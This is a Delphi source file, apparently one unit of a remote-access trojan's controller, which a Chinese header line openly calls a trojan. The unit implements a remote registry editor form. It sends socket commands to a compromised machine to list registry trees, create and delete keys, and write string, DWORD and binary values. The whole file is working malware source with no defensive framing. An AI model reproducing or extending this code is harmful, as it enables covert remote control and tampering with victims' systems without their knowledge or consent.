unit7.pas

由于该木马有三个服务端可以选择生成

unit Unit7;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ImgList, ComCtrls, StdCtrls,winsock, Menus, ExtCtrls;

type
  TForm7 = class(TForm)
    ImageList1: TImageList;
    tv: TTreeView;
    StatusBar1: TStatusBar;
    ListBox2: TListBox;
    ListBox3: TListBox;
    PopupMenu1: TPopupMenu;
    PopupMenu2: TPopupMenu;
    N2: TMenuItem;
    N3: TMenuItem;
    Edit1: TEdit;
    N1: TMenuItem;
    N4: TMenuItem;
    N5: TMenuItem;
    N6: TMenuItem;
    N7: TMenuItem;
    N8: TMenuItem;
    Splitter1: TSplitter;
    ListView1: TListView;
    Edit2: TEdit;
    StatusBar2: TStatusBar;
    procedure tvDblClick(Sender: TObject);
    procedure N2Click(Sender: TObject);
    procedure N1Click(Sender: TObject);
    procedure N4Click(Sender: TObject);
    procedure N5Click(Sender: TObject);
    procedure N6Click(Sender: TObject);
    procedure N7Click(Sender: TObject);
    procedure N8Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form7: TForm7;

implementation

{$R *.dfm}
function LastPos(Needle: Char; Haystack: String): integer;
begin
  for Result := Length(Haystack) downto 1 do
  if Haystack[Result] = Needle then
  Break;
end;
procedure TForm7.tvDblClick(Sender: TObject);
var
 f:string;
 sock:integer;
 a:ttreenode;
 b:string;
 c:integer;
begin
 a:=tv.selected;
 b:=a.text ;
 while a.parent<>nil do
 begin
  a:=a.parent;
  b:=a.text+'\'+b;
 end;
 edit2.Text:=b;
 c:=pos('\',b);
 if c>0 then
 begin
 if copy(b,1,c-1)='HKEY_CLASSES_ROOT' then
 edit1.text:='1'+copy(b,c+1,length(b)-c);
 if copy(b,1,c-1)='HKEY_CURRENT_USER' then
 edit1.text:='2'+copy(b,c+1,length(b)-c);
 if copy(b,1,c-1)='HKEY_LOCAL_MACHINE' then
 edit1.text:='3'+copy(b,c+1,length(b)-c);
 if copy(b,1,c-1)='HKEY_USERS' then
 edit1.text:='4'+copy(b,c+1,length(b)-c);
 if copy(b,1,c-1)='HKEY_CURRENT_CONFIG' then
 edit1.text:='5'+copy(b,c+1,length(b)-c);
 end else
 begin
 if b='HKEY_CLASSES_ROOT' then
 edit1.text:='1';
 if b='HKEY_CURRENT_USER' then
 edit1.text:='2';
 if b='HKEY_LOCAL_MACHINE' then
 edit1.text:='3';
 if b='HKEY_USERS' then
 edit1.text:='4';
 if b='HKEY_CURRENT_CONFIG' then
 edit1.text:='5';
 end;
 listview1.Clear ;
 listbox2.Clear ;
 listbox3.Clear ;
 form7.PopupMenu1.AutoPopup :=true;
 form7.PopupMenu2.AutoPopup :=true;
 tv.Selected.DeleteChildren;
 tv.Enabled:=false;
 listview1.Enabled:=false;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='36'+edit1.Text;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在接收远程注册表的信息...'  ;
end;                 
procedure TForm7.N2Click(Sender: TObject);
var
 sock:integer;
 f:string;
begin
 If (listview1.ItemIndex = -1) Then Exit;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='40'+edit1.text+'^'+listview1.ItemFocused.caption;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送删除键值命令...'  ;
end;
procedure TForm7.N1Click(Sender: TObject);
var
 sock:integer;
 f,s1:string;
begin
 s1:=Inputbox('提示','输入项名:          ','');
 if s1='' then exit;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='41'+edit1.text+'\'+s1;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送新建项命令...'  ;
end;

procedure TForm7.N4Click(Sender: TObject);
var
 a,sock:integer;
 f:string;
begin
 sock:=strtoint(statusbar2.Panels[0].text);
 a:=lastpos('\',edit1.text);
 if copy(edit1.text,a+1,length(edit1.text)-a)=tv.Selected.Text then
 f:='42'+copy(edit1.text,1,a-1)+'\'+tv.Selected.Text
 else
 f:='42'+edit1.text+'\'+tv.Selected.Text;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送删除项命令...'  ;
end;

procedure TForm7.N5Click(Sender: TObject);
begin
 tv.Items.Clear;
 form7.tv.Items.Add(nil,'HKEY_CLASSES_ROOT');
 form7.tv.Items.Add(nil,'HKEY_CURRENT_USER');
 form7.tv.Items.Add(nil,'HKEY_LOCAL_MACHINE');
 form7.tv.Items.Add(nil,'HKEY_USERS');
 form7.tv.Items.Add(nil,'HKEY_CURRENT_CONFIG');
 listview1.Clear;
 edit2.text:='';
 form7.PopupMenu1.AutoPopup :=false;
 form7.PopupMenu2.AutoPopup :=false;
 statusbar1.Panels[0].text:='远程注册表信息刷新完毕.'  ;
end;

procedure TForm7.N6Click(Sender: TObject);
var
 sock:integer;
 f,s1,s2:string;
begin
 s1:=Inputbox('提示','输入键名:          ','');
 if s1='' then exit;
 s2:=Inputbox('提示','输入键值:               ','');
 if s2='' then exit;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='37'+edit1.text+'^'+s1+'~'+s2;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送新建字串键值命令...'  ;
end; 

procedure TForm7.N7Click(Sender: TObject);
var
 sock:integer;
 f,s1,s2:string;
begin
 s1:=Inputbox('提示','输入键名:          ','');
 if s1='' then exit;
 s2:=Inputbox('提示','输入键值:               ','');
 if s2='' then exit;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='39'+edit1.text+'^'+s1+'~'+s2;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送新建双字节键值命令...'  ;
end;

procedure TForm7.N8Click(Sender: TObject);
var
 sock:integer;
 f,s1,s2:string;
begin
 s1:=Inputbox('提示','输入键名:          ','');
 if s1='' then exit;
 s2:=Inputbox('提示','输入键值:               ','');
 if s2='' then exit;
 if length(s2)<2 then
 begin
  messagebox(0,'请输入一个标准值','提示',MB_ICONHAND);
  exit;
 end;
 sock:=strtoint(statusbar2.Panels[0].text);
 f:='38'+edit1.text+'^'+s1+'~'+s2;
 send(sock,f[1],length(f),0);
 statusbar1.Panels[0].text:='正在发送新建二进制键值命令...'  ;
end;

end.